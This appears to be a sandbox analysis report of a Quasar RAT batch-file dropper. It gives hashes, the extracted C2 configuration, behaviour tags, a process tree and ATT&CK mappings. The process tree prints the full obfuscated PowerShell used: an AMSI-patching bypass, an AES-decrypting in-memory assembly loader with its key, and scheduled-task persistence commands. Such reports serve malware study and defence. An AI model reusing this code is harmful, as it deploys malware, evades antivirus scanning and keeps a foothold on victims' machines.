Analysis

  • max time kernel
    300s
  • max time network
    298s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
  • submitted
    28-05-2024 13:42

General

  • Target

    New1.bat

  • Size

    1002KB

  • MD5

    f6d5bfaee8a55ff72c7b453fda066d62

  • SHA1

    7d737d53013990e5d05076b7206e43eb4793fc7f

  • SHA256

    3ff8b6a041a96625d730dfe770eb6e84be8ce99fc50a0027724e48394f053308

  • SHA512

    e300c15bef9e898e7abd4ecf6759c0e60829e8d9b507e257359b0c0342c56d56adf7924c76ffbbee4c42e1b1ea229b7032d177849d2668720090780190b7f284

  • SSDEEP

    12288:NzPPeJOTZMGuIl99I2FxGwvYXDSeengmfn5tKvy0H5JbcGfRZIJZ32hxnQxCGaF9:NDeYum99IGP8f2rRO5JFPIJZ8GaF8XmB

Malware Config

Extracted

Family

quasar

Attributes
  • reconnect_delay

    3000

Extracted

Family

quasar

Version

3.1.5

Botnet

Video

C2

runderscore00-25501.portmap.host:25501

Mutex

$Sxr-oWTh3ZS9htfe80iIl5

Attributes
  • encryption_key

    zK8u0rpHf4TJzGf65Flt

  • install_name

    Win11.exe

  • log_directory

    $sxr-Logs

  • reconnect_delay

    3000

  • startup_key

    Windows 11 Boot

  • subdirectory

    Win11

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar payload 4 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell and hide display window.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 16 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 58 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:584
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:992
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{6c83b817-91fc-4304-bb0c-00cbd03f8f78}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:2496
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
          PID:636
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay
          1⤵
            PID:744
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k dcomlaunch -s LSM
            1⤵
              PID:900
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
              1⤵
                PID:484
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts
                1⤵
                  PID:600
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog
                  1⤵
                  • Drops file in System32 directory
                  PID:1028
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                  1⤵
                    PID:1044
                    • c:\windows\system32\taskhostw.exe
                      taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                      2⤵
                        PID:3012
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:llKRvSZMllYW{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$MyHGrZCzLVvveu,[Parameter(Position=1)][Type]$hUFPmYcTkO)$fpDSKjXfiQH=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+[Char](102)+''+'l'+''+[Char](101)+'c'+[Char](116)+''+[Char](101)+'d'+[Char](68)+'e'+'l'+''+[Char](101)+''+'g'+''+'a'+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+[Char](77)+''+[Char](101)+''+'m'+''+[Char](111)+''+'r'+''+[Char](121)+'M'+[Char](111)+'d'+'u'+''+[Char](108)+''+'e'+'',$False).DefineType('My'+'D'+''+[Char](101)+''+[Char](108)+'e'+'g'+''+[Char](97)+''+'t'+''+[Char](101)+''+[Char](84)+'y'+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](80)+''+'u'+''+'b'+''+'l'+''+[Char](105)+''+[Char](99)+''+','+'S'+[Char](101)+'a'+[Char](108)+''+[Char](101)+''+[Char](100)+','+[Char](65)+''+[Char](110)+''+'s'+'i'+[Char](67)+''+'l'+''+[Char](97)+''+'s'+''+'s'+''+[Char](44)+'A'+'u'+''+[Char](116)+''+[Char](111)+'Cl'+[Char](97)+''+[Char](115)+'s',[MulticastDelegate]);$fpDSKjXfiQH.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+''+'p'+'ec'+[Char](105)+''+[Char](97)+''+'l'+'Na'+[Char](109)+''+'e'+''+[Char](44)+''+[Char](72)+'i'+[Char](100)+''+'e'+''+'B'+''+[Char](121)+''+'S'+''+[Char](105)+''+[Char](103)+',P'+[Char](117)+''+[Char](98)+''+'l'+''+'i'+'c',[Reflection.CallingConventions]::Standard,$MyHGrZCzLVvveu).SetImplementationFlags(''+'R'+''+'u'+''+[Char](110)+''+[Char](116)+'ime,Mana'+[Char](103)+'ed');$fpDSKjXfiQH.DefineMethod('I'+[Char](110)+''+[Char](118)+''+'o'+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+'ic'+[Char](44)+'H'+[Char](105)+''+[Char](100)+'e'+'B'+''+'y'+'Si'+'g'+''+[Char](44)+''+[Char](78)+'e'+[Char](119)+'Sl'+[Char](111)+''+[Char](116)+''+','+''+[Char](86)+'ir'+[Char](116)+''+'u'+'a'+[Char](108)+'',$hUFPmYcTkO,$MyHGrZCzLVvveu).SetImplementationFlags(''+[Char](82)+'u'+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $fpDSKjXfiQH.CreateType();}$dncjQUcGxJIWl=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+'t'+[Char](101)+''+'m'+''+[Char](46)+''+'d'+'ll')}).GetType('M'+[Char](105)+''+'c'+'r'+[Char](111)+'s'+[Char](111)+''+[Char](102)+''+'t'+''+[Char](46)+'W'+[Char](105)+''+[Char](110)+''+'3'+'2.U'+[Char](110)+''+'s'+''+[Char](97)+''+[Char](102)+''+[Char](101)+''+[Char](78)+''+[Char](97)+'t'+[Char](105)+'v'+[Char](101)+''+[Char](77)+''+'e'+''+[Char](116)+''+[Char](104)+''+'o'+''+'d'+''+[Char](115)+'');$xrFLYAdtQlnhiK=$dncjQUcGxJIWl.GetMethod(''+[Char](71)+''+'e'+''+'t'+''+[Char](80)+'r'+'o'+''+[Char](99)+''+[Char](65)+''+[Char](100)+''+[Char](100)+''+'r'+''+[Char](101)+'s'+'s'+'',[Reflection.BindingFlags](''+'P'+''+'u'+''+'b'+''+[Char](108)+''+[Char](105)+''+'c'+','+[Char](83)+''+'t'+''+[Char](97)+''+[Char](116)+''+'i'+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$lbTKnVbgmaRQkYuBXkv=llKRvSZMllYW @([String])([IntPtr]);$uAkNTsgbHvdGMnhilDCjwF=llKRvSZMllYW @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$HQDHcWrrWZP=$dncjQUcGxJIWl.GetMethod(''+[Char](71)+'e'+[Char](116)+'Mo'+'d'+''+[Char](117)+''+[Char](108)+'eHa'+'n'+''+'d'+''+'l'+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+'e'+[Char](114)+''+[Char](110)+'e'+[Char](108)+''+[Char](51)+''+[Char](50)+''+'.'+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$HWSOotrTsxxFpR=$xrFLYAdtQlnhiK.Invoke($Null,@([Object]$HQDHcWrrWZP,[Object](''+'L'+''+'o'+''+[Char](97)+'d'+'L'+''+'i'+''+[Char](98)+''+[Char](114)+''+[Char](97)+''+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$jsPXUeZOBRDOzLaWS=$xrFLYAdtQlnhiK.Invoke($Null,@([Object]$HQDHcWrrWZP,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+'tu'+'a'+''+'l'+''+'P'+'r'+[Char](111)+''+[Char](116)+''+[Char](101)+''+[Char](99)+''+[Char](116)+'')));$BgTFYXp=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($HWSOotrTsxxFpR,$lbTKnVbgmaRQkYuBXkv).Invoke(''+[Char](97)+'m'+[Char](115)+''+[Char](105)+''+'.'+'d'+[Char](108)+''+[Char](108)+'');$ezApSscxgXTuikWSS=$xrFLYAdtQlnhiK.Invoke($Null,@([Object]$BgTFYXp,[Object](''+[Char](65)+'m'+[Char](115)+'iSc'+'a'+''+'n'+''+[Char](66)+''+[Char](117)+'f'+[Char](102)+''+[Char](101)+''+[Char](114)+'')));$kRCWvciZRy=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($jsPXUeZOBRDOzLaWS,$uAkNTsgbHvdGMnhilDCjwF).Invoke($ezApSscxgXTuikWSS,[uint32]8,4,[ref]$kRCWvciZRy);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$ezApSscxgXTuikWSS,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($jsPXUeZOBRDOzLaWS,$uAkNTsgbHvdGMnhilDCjwF).Invoke($ezApSscxgXTuikWSS,[uint32]8,0x20,[ref]$kRCWvciZRy);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+[Char](84)+''+[Char](87)+'ARE').GetValue(''+[Char](36)+''+[Char](55)+''+[Char](55)+''+'s'+''+'t'+'a'+'g'+''+'e'+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"
                        2⤵
                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                        • Drops file in System32 directory
                        • Suspicious use of SetThreadContext
                        • Modifies data under HKEY_USERS
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of WriteProcessMemory
                        PID:212
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService
                      1⤵
                        PID:1080
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k localservice -s nsi
                        1⤵
                          PID:1128
                        • c:\windows\system32\svchost.exe
                          c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                          1⤵
                            PID:1192
                          • c:\windows\system32\svchost.exe
                            c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp
                            1⤵
                              PID:1280
                            • c:\windows\system32\svchost.exe
                              c:\windows\system32\svchost.exe -k localservice -s EventSystem
                              1⤵
                                PID:1300
                              • c:\windows\system32\svchost.exe
                                c:\windows\system32\svchost.exe -k netsvcs -s Themes
                                1⤵
                                  PID:1308
                                • c:\windows\system32\svchost.exe
                                  c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                                  1⤵
                                    PID:1412
                                    • c:\windows\system32\sihost.exe
                                      sihost.exe
                                      2⤵
                                        PID:2916
                                    • c:\windows\system32\svchost.exe
                                      c:\windows\system32\svchost.exe -k netsvcs -s SENS
                                      1⤵
                                        PID:1472
                                      • c:\windows\system32\svchost.exe
                                        c:\windows\system32\svchost.exe -k networkservice -s NlaSvc
                                        1⤵
                                          PID:1520
                                        • c:\windows\system32\svchost.exe
                                          c:\windows\system32\svchost.exe -k networkservice -s Dnscache
                                          1⤵
                                            PID:1536
                                          • c:\windows\system32\svchost.exe
                                            c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder
                                            1⤵
                                              PID:1548
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
                                              1⤵
                                                PID:1640
                                              • c:\windows\system32\svchost.exe
                                                c:\windows\system32\svchost.exe -k localservice -s netprofm
                                                1⤵
                                                  PID:1692
                                                • c:\windows\system32\svchost.exe
                                                  c:\windows\system32\svchost.exe -k appmodel -s StateRepository
                                                  1⤵
                                                    PID:1808
                                                  • C:\Windows\System32\svchost.exe
                                                    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
                                                    1⤵
                                                      PID:1816
                                                    • C:\Windows\system32\svchost.exe
                                                      C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted
                                                      1⤵
                                                        PID:1828
                                                      • c:\windows\system32\svchost.exe
                                                        c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                                                        1⤵
                                                          PID:2004
                                                        • C:\Windows\System32\spoolsv.exe
                                                          C:\Windows\System32\spoolsv.exe
                                                          1⤵
                                                            PID:2040
                                                          • c:\windows\system32\svchost.exe
                                                            c:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation
                                                            1⤵
                                                              PID:1596
                                                            • c:\windows\system32\svchost.exe
                                                              c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
                                                              1⤵
                                                                PID:2264
                                                              • c:\windows\system32\svchost.exe
                                                                c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                                                                1⤵
                                                                  PID:2272
                                                                • c:\windows\system32\svchost.exe
                                                                  c:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent
                                                                  1⤵
                                                                    PID:2320
                                                                  • c:\windows\system32\svchost.exe
                                                                    c:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc
                                                                    1⤵
                                                                      PID:2364
                                                                    • c:\windows\system32\svchost.exe
                                                                      c:\windows\system32\svchost.exe -k netsvcs -s Browser
                                                                      1⤵
                                                                        PID:2396
                                                                      • c:\windows\system32\svchost.exe
                                                                        c:\windows\system32\svchost.exe -k networkservice -s CryptSvc
                                                                        1⤵
                                                                        • Drops file in System32 directory
                                                                        PID:2412
                                                                      • C:\Windows\sysmon.exe
                                                                        C:\Windows\sysmon.exe
                                                                        1⤵
                                                                          PID:2456
                                                                        • c:\windows\system32\svchost.exe
                                                                          c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks
                                                                          1⤵
                                                                            PID:2464
                                                                          • c:\windows\system32\svchost.exe
                                                                            c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
                                                                            1⤵
                                                                              PID:2480
                                                                            • c:\windows\system32\svchost.exe
                                                                              c:\windows\system32\svchost.exe -k netsvcs -s WpnService
                                                                              1⤵
                                                                                PID:2500
                                                                              • c:\windows\system32\svchost.exe
                                                                                c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
                                                                                1⤵
                                                                                  PID:2948
                                                                                • C:\Windows\system32\wbem\unsecapp.exe
                                                                                  C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                                  1⤵
                                                                                    PID:2968
                                                                                  • c:\windows\system32\svchost.exe
                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s TokenBroker
                                                                                    1⤵
                                                                                      PID:2636
                                                                                    • C:\Windows\Explorer.EXE
                                                                                      C:\Windows\Explorer.EXE
                                                                                      1⤵
                                                                                        PID:3264
                                                                                        • C:\Windows\system32\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\New1.bat"
                                                                                          2⤵
                                                                                          • Suspicious use of WriteProcessMemory
                                                                                          PID:1104
                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('F+5wamWtVzd3aK2bnS7nWh4XV0PZc2pVZ9YG0yRK5cI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lnHVCKXb70Ny+fnCAwMhpw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $fLkgt=New-Object System.IO.MemoryStream(,$param_var); $wtCVF=New-Object System.IO.MemoryStream; $XRlUB=New-Object System.IO.Compression.GZipStream($fLkgt, [IO.Compression.CompressionMode]::Decompress); $XRlUB.CopyTo($wtCVF); $XRlUB.Dispose(); $fLkgt.Dispose(); $wtCVF.Dispose(); $wtCVF.ToArray();}function execute_function($param_var,$param2_var){ $PEWwL=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $iVLBa=$PEWwL.EntryPoint; $iVLBa.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\New1.bat';$OJTBF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\New1.bat').Split([Environment]::NewLine);foreach ($Wvrxg in $OJTBF) { if ($Wvrxg.StartsWith(':: ')) { $TvDjF=$Wvrxg.Substring(3); break; }}$payloads_var=[string[]]$TvDjF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
                                                                                            3⤵
                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                            • Modifies registry class
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            • Suspicious use of WriteProcessMemory
                                                                                            PID:752
                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_80_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_80.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
                                                                                              4⤵
                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              PID:4460
                                                                                            • C:\Windows\SysWOW64\WScript.exe
                                                                                              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_80.vbs"
                                                                                              4⤵
                                                                                              • Suspicious use of WriteProcessMemory
                                                                                              PID:4740
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_80.bat" "
                                                                                                5⤵
                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                PID:4688
                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  6⤵
                                                                                                    PID:4704
                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('F+5wamWtVzd3aK2bnS7nWh4XV0PZc2pVZ9YG0yRK5cI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lnHVCKXb70Ny+fnCAwMhpw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $fLkgt=New-Object System.IO.MemoryStream(,$param_var); $wtCVF=New-Object System.IO.MemoryStream; $XRlUB=New-Object System.IO.Compression.GZipStream($fLkgt, [IO.Compression.CompressionMode]::Decompress); $XRlUB.CopyTo($wtCVF); $XRlUB.Dispose(); $fLkgt.Dispose(); $wtCVF.Dispose(); $wtCVF.ToArray();}function execute_function($param_var,$param2_var){ $PEWwL=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $iVLBa=$PEWwL.EntryPoint; $iVLBa.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_80.bat';$OJTBF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_80.bat').Split([Environment]::NewLine);foreach ($Wvrxg in $OJTBF) { if ($Wvrxg.StartsWith(':: ')) { $TvDjF=$Wvrxg.Substring(3); break; }}$payloads_var=[string[]]$TvDjF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
                                                                                                    6⤵
                                                                                                    • Blocklisted process makes network request
                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                    PID:4304
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\New.exe
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\New.exe"
                                                                                                      7⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                      PID:2644
                                                                                                      • C:\Windows\SysWOW64\SCHTASKS.exe
                                                                                                        "SCHTASKS.exe" /create /tn "$77New.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\New.exe'" /sc onlogon /rl HIGHEST
                                                                                                        8⤵
                                                                                                        • Creates scheduled task(s)
                                                                                                        PID:3228
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Install.exe
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\Install.exe"
                                                                                                      7⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:2648
                                                                                        • C:\Windows\System32\RuntimeBroker.exe
                                                                                          C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                          1⤵
                                                                                            PID:3792
                                                                                          • C:\Windows\system32\DllHost.exe
                                                                                            C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                            1⤵
                                                                                              PID:4036
                                                                                            • c:\windows\system32\svchost.exe
                                                                                              c:\windows\system32\svchost.exe -k localservice -s CDPSvc
                                                                                              1⤵
                                                                                                PID:4728
                                                                                              • c:\windows\system32\svchost.exe
                                                                                                c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV
                                                                                                1⤵
                                                                                                  PID:4468
                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                  C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc
                                                                                                  1⤵
                                                                                                  • Modifies data under HKEY_USERS
                                                                                                  PID:3456
                                                                                                • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                  "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                  1⤵
                                                                                                  • Drops file in System32 directory
                                                                                                  • Modifies data under HKEY_USERS
                                                                                                  PID:3276
                                                                                                • c:\windows\system32\svchost.exe
                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc
                                                                                                  1⤵
                                                                                                    PID:4660
                                                                                                  • C:\Windows\system32\DllHost.exe
                                                                                                    C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                    1⤵
                                                                                                      PID:4436
                                                                                                    • C:\Windows\system32\ApplicationFrameHost.exe
                                                                                                      C:\Windows\system32\ApplicationFrameHost.exe -Embedding
                                                                                                      1⤵
                                                                                                        PID:2076
                                                                                                      • C:\Windows\System32\InstallAgent.exe
                                                                                                        C:\Windows\System32\InstallAgent.exe -Embedding
                                                                                                        1⤵
                                                                                                          PID:4996
                                                                                                        • C:\Windows\system32\DllHost.exe
                                                                                                          C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
                                                                                                          1⤵
                                                                                                            PID:2892
                                                                                                          • C:\Windows\sysWOW64\wbem\wmiprvse.exe
                                                                                                            C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
                                                                                                            1⤵
                                                                                                              PID:1388
                                                                                                            • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                              C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                              1⤵
                                                                                                              • Checks BIOS information in registry
                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                              PID:4008

                                                                                                            Network

                                                                                                            MITRE ATT&CK Matrix ATT&CK v13

                                                                                                            Execution

                                                                                                            Command and Scripting Interpreter

                                                                                                            1
                                                                                                            T1059

                                                                                                            PowerShell

                                                                                                            1
                                                                                                            T1059.001

                                                                                                            Scheduled Task/Job

                                                                                                            1
                                                                                                            T1053

                                                                                                            Persistence

                                                                                                            Scheduled Task/Job

                                                                                                            1
                                                                                                            T1053

                                                                                                            Privilege Escalation

                                                                                                            Scheduled Task/Job

                                                                                                            1
                                                                                                            T1053

                                                                                                            Discovery

                                                                                                            Query Registry

                                                                                                            1
                                                                                                            T1012

                                                                                                            System Information Discovery

                                                                                                            2
                                                                                                            T1082

                                                                                                            Replay Monitor

                                                                                                            Loading Replay Monitor...

                                                                                                            Downloads

                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
                                                                                                              Filesize

                                                                                                              2KB

                                                                                                              MD5

                                                                                                              ac3d19fbb5c5f10833f1882308f77548

                                                                                                              SHA1

                                                                                                              ac880466fd99a5719fedc7289b00d78ba7088e06

                                                                                                              SHA256

                                                                                                              3353b90af649198e084632af776f8c6ea3a9302da5a50d85f7ecde1c7ad295df

                                                                                                              SHA512

                                                                                                              b5e6369d7f475e9931d19fb2a5305b4c901ca5fcac5d788d064b6a1b1d6de2034e84932ac243d5056c745b924a2e9537a06b4172fab364402263788c814bc28b

                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                              Filesize

                                                                                                              17KB

                                                                                                              MD5

                                                                                                              19a55e60e121a540fc521e9f678a85d9

                                                                                                              SHA1

                                                                                                              82249ad9c017d256b3c15efb89eb7fa79148e663

                                                                                                              SHA256

                                                                                                              9fca5871afcefc9a4eecca771046d20b8acc897f37f21fe62beafe5e3b186715

                                                                                                              SHA512

                                                                                                              29c28f7357670ffc047be50630b460f0504aba7cc628a30826d2a601d1622af3a757c79c59276072cf61ac877fca516e66720cfd433911dee6ec596816c7716b

                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Install.exe
                                                                                                              Filesize

                                                                                                              163KB

                                                                                                              MD5

                                                                                                              b51552b77057c2405f73bbbf9c89234a

                                                                                                              SHA1

                                                                                                              4793adbba023f90d2d2ad0ec55199c56de815224

                                                                                                              SHA256

                                                                                                              720e6962d75e37e8b47b160c5b3f60433a341f00abf60041630116b26858fbb0

                                                                                                              SHA512

                                                                                                              564f4104e6e398eeef8acc7ce7cab694b6eebbe4233b7cb359829242b949dc7c5bf124a550a4d0402eb7da19b8bec6c1f6753563b17a8ae36fb639be595b8d66

                                                                                                            • C:\Users\Admin\AppData\Local\Temp\New.exe
                                                                                                              Filesize

                                                                                                              409KB

                                                                                                              MD5

                                                                                                              cf570b21f42f0ce411b7c9961068931e

                                                                                                              SHA1

                                                                                                              f92aa688a1dbd64a4585ecfe80a9c2d7f408c57d

